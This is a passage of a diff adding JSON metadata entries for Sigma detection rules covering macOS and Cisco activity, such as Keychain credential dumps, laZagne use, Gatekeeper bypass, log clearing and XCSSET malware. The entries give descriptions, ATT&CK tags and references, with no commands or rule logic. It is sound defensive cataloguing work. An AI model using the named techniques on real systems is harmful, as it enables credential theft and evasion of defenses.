"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_startup_items.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1037.005" + ], + "creation_date": "2020/10/14", + "filename": "file_event_macos_startup_items.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "file_event", + "logsource.product": "macos" + } + }, + { + "description": "Detects execution of AppleScript of the macOS scripting language AppleScript.", + "uuid": "1bc2e6c5-0885-472b-bed6-be5ea8eace55", + "value": "MacOS Scripting Interpreter AppleScript", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_applescript.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.002" + ], + "creation_date": "2020/10/21", + "filename": "proc_creation_macos_applescript.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "medium", + "falsepositive": [ + "Application installers might contain scripts as part of the installation process." + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", + "uuid": "719c22d7-c11a-4f2c-93a6-2cfdd5412f68", + "value": "Decode Base64 Encoded Text -MacOs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_base64_decode.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.", + "uuid": "95361ce5-c891-4b0a-87ca-e24607884a96", + "value": "Binary Padding - MacOS", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_binary_padding.yml", + "author": "Igor Fits, Mikhail Larin, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate script work" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detect file time attribute change to hide new or changes to existing files", + "uuid": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", + "value": "File Time Attribute Change", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_change_file_time_attr.yml", + "author": "Igor Fits, Mikhail Larin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects deletion of local audit logs", + "uuid": "acf61bd8-d814-4272-81f0-a7a269aa69aa", + "value": "Indicator Removal on Host - Clear Mac System Logs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ], + "creation_date": "2020/10/11", + "filename": "proc_creation_macos_clear_system_logs.yml", + "author": "remotephone, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", + "uuid": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731", + "value": "Creation Of A Local User Account", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" + ], + "tags": [ + "attack.t1136.001", + "attack.persistence" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_macos_create_account.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option", + "uuid": "b22a5b36-2431-493a-8be1-0bae56c28ef3", + "value": "Hidden User Creation", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ], + "creation_date": "2020/10/10", + "filename": "proc_creation_macos_create_hidden_account.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects passwords dumps from Keychain", + "uuid": "b120b587-a4c2-4b94-875d-99c9807d6955", + "value": "Credentials from Password Stores - Keychain", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md", + "https://gist.github.com/Capybara/6228955", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.001" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_creds_from_keychain.yml", + "author": "Tim Ismilyaev, oscd.community, Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects disabling security tools", + "uuid": "ff39f1a6-84ac-476f-a1af-37fcdf53d7c0", + "value": "Disable Security Tools", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_disable_security_tools.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects usage of system utilities to discover files and directories", + "uuid": "089dbdf6-b960-4bcc-90e3-ffc3480c20f6", + "value": "File and Directory Discovery - MacOS", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_file_and_directory_discovery.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detecting attempts to extract passwords with grep and laZagne", + "uuid": "53b1b378-9b06-4992-b972-dde6e423d2b4", + "value": "Credentials In Files", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_find_cred_in_files.yml", + "author": "Igor Fits, Mikhail Larin, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects attempts to use system dialog prompts to capture user credentials", + "uuid": "60f1ce20-484e-41bd-85f4-ac4afec2c541", + "value": "GUI Input Capture - macOS", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md", + "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1056.002" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_macos_gui_input_capture.yml", + "author": "remotephone, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration tools and activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects enumeration of local systeam accounts on MacOS", + "uuid": "ddf36b67-e872-4507-ab2e-46bda21b842c", + "value": "Local System Accounts Discovery - MacOs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_account.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ], + "creation_date": "2020/10/08", + "filename": "proc_creation_macos_local_account.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects enumeration of local system groups", + "uuid": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276", + "value": "Local Groups Discovery - MacOs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_groups.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2020/10/11", + "filename": "proc_creation_macos_local_groups.yml", + "author": "\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects enumeration of local or remote network services.", + "uuid": "84bae5d4-b518-4ae0-b331-6d4afd34d00f", + "value": "MacOS Network Service Scanning", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2020/10/21", + "filename": "proc_creation_macos_network_service_scanning.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects the usage of tooling to sniff network traffic.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "uuid": "adc9bcc4-c39c-4f6b-a711-1884017bf043", + "value": "Network Sniffing - MacOs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_sniffing.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ], + "creation_date": "2020/10/14", + "filename": "proc_creation_macos_network_sniffing.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.", + "uuid": "234dc5df-40b5-49d1-bf53-0d44ce778eca", + "value": "Payload Decoded and Decrypted via Built-in Utilities", + "meta": { + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml" + ], + "tags": [ + "attack.t1059", + "attack.t1204", + "attack.execution", + "attack.t1140", + "attack.defense_evasion", + "attack.s0482", + "attack.s0402" + ], + "creation_date": "2022/10/17", + "filename": "proc_creation_macos_payload_decoded_and_decrypted.yml", + "author": "Tim Rauch (rule), Elastic (idea)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects the enumeration of other remote systems.", + "uuid": "10227522-8429-47e6-a301-f2b2d014e7ad", + "value": "Macos Remote System Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ], + "creation_date": "2020/10/22", + "filename": "proc_creation_macos_remote_system_discovery.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", + "uuid": "7c3b43d8-d794-47d2-800a-d277715aa460", + "value": "Scheduled Cron Task/Job - MacOs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.003" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_macos_schedule_task_job_cron.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects attempts to use screencapture to collect macOS screenshots", + "uuid": "0877ed01-da46-4c49-8476-d49cdd80dfa7", + "value": "Screen Capture - macOS", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_macos_screencapture.yml", + "author": "remotephone, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate user activity taking screenshots" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects usage of system utilities (only grep for now) to discover security software discovery", + "uuid": "0ed75b9c-c73b-424d-9e7d-496cd565fbe0", + "value": "Security Software Discovery - MacOs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_security_software_discovery.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.", + "uuid": "b6e2a2e3-2d30-43b1-a4ea-071e36595690", + "value": "Space After Filename - macOS", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_space_after_filename.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.006" + ], + "creation_date": "2021/11/20", + "filename": "proc_creation_macos_space_after_filename.yml", + "author": "remotephone", + "level": "low", + "falsepositive": [ + "Mistyped commands or legitimate binaries named to match the pattern" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", + "uuid": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12", + "value": "Split A File Into Pieces", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1030" + ], + "creation_date": "2020/10/15", + "filename": "proc_creation_macos_split_file_into_pieces.yml", + "author": "Igor Fits, Mikhail Larin, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects when the macOS Script Editor utility spawns an unusual child process.", + "uuid": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", + "value": "Suspicious Execution via macOS Script Editor", + "meta": { + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", + "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.002", + "attack.initial_access", + "attack.t1059", + "attack.t1059.002", + "attack.t1204", + "attack.t1204.001", + "attack.execution", + "attack.persistence", + "attack.t1553", + "attack.defense_evasion" + ], + "creation_date": "2022/10/21", + "filename": "proc_creation_macos_susp_execution_macos_script_editor.yml", + "author": "Tim Rauch (rule), Elastic (idea)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects commandline operations on shell history files", + "uuid": "508a9374-ad52-4789-b568-fc358def2c65", + "value": "Suspicious History File Operations", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ], + "creation_date": "2020/10/17", + "filename": "proc_creation_macos_susp_histfile_operations.yml", + "author": "Mikhail Larin, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administrative activity", + "Legitimate software, cleaning hist file" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.", + "uuid": "7ed2c9f7-c59d-4c82-a7e2-f859aa676099", + "value": "Suspicious MacOS Firmware Activity", + "meta": { + "refs": [ + "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", + "https://www.manpagez.com/man/8/firmwarepasswd/", + "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/30", + "filename": "proc_creation_macos_susp_macos_firmware_activity.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects usage of system utilities to discover system network connections", + "uuid": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", + "value": "System Network Connections Discovery - MacOs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_system_network_connections_discovery.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects enumeration of local network configuration", + "uuid": "58800443-f9fc-4d55-ae0c-98a3966dfb97", + "value": "System Network Discovery - macOS", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_macos_system_network_discovery.yml", + "author": "remotephone, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", + "uuid": "40b1fbe2-18ea-4ee7-be47-0294285811de", + "value": "System Shutdown/Reboot - MacOs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_system_shutdown_reboot.yml", + "author": "Igor Fits, Mikhail Larin, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.", + "uuid": "f68c4a4f-19ef-4817-952c-50dce331f4b0", + "value": "Potential WizardUpdate Malware Infection", + "meta": { + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" + ], + "tags": [ + "attack.command_and_control" + ], + "creation_date": "2022/10/17", + "filename": "proc_creation_macos_wizardupdate_malware_infection.yml", + "author": "Tim Rauch (rule), Elastic (idea)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects macOS Gatekeeper bypass via xattr utility", + "uuid": "f5141b6d-9f42-41c6-a7bf-2a780678b29b", + "value": "Gatekeeper Bypass via Xattr", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.001/T1553.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.001" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_xattr_gatekeeper_bypass.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.", + "uuid": "47d65ac0-c06f-4ba2-a2e3-d263139d0f51", + "value": "Potential XCSSET Malware Infection", + "meta": { + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" + ], + "tags": [ + "attack.command_and_control" + ], + "creation_date": "2022/10/17", + "filename": "proc_creation_macos_xcsset_malware_infection.yml", + "author": "Tim Rauch (rule), Elastic (idea)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Clear command history in network OS which is used for defense evasion", + "uuid": "ceb407f6-8277-439b-951f-e4210e3ed956", + "value": "Cisco Clear Logs", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_clear_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ], + "creation_date": "2019/08/12", + "filename": "cisco_cli_clear_logs.yml", + "author": "Austin Clark", + "level": "high", + "falsepositive": [ + "Legitimate administrators may run these commands" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Collect pertinent data from the configuration files", + "uuid": "cd072b25-a418-4f98-8ebc-5093fb38fe1a", + "value": "Cisco Collect Data", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_collect_data.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.collection", + "attack.t1087.001", + "attack.t1552.001", + "attack.t1005" + ], + "creation_date": "2019/08/11", + "filename": "cisco_cli_collect_data.yml", + "author": "Austin Clark", + "level": "low", + "falsepositive": [ + "Commonly run by administrators" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Show when private keys are being exported from the device, or when new certificates are installed", + "uuid": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", + "value": "Cisco Crypto Commands", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml" + ], + "tags": [ + "attack.credential_access", + "attack.defense_evasion", + "attack.t1553.004", + "attack.t1552.004" + ], + "creation_date": "2019/08/12", + "filename": "cisco_cli_crypto_actions.yml", + "author": "Austin Clark", + "level": "high", + "falsepositive": [ + "Not commonly run by administrators. Also whitelist your known good certificates" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Turn off logging locally or remote", + "uuid": "9e8f6035-88bf-4a63-96b6-b17c0508257e", + "value": "Cisco Disabling Logging", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_disable_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2019/08/11", + "filename": "cisco_cli_disable_logging.yml", + "author": "Austin Clark", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Find information about network devices that is not stored in config files", + "uuid": "9705a6a1-6db6-4a16-a987-15b7151e299b", + "value": "Cisco Discovery", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083", + "attack.t1201", + "attack.t1057", + "attack.t1018", + "attack.t1082", + "attack.t1016", + 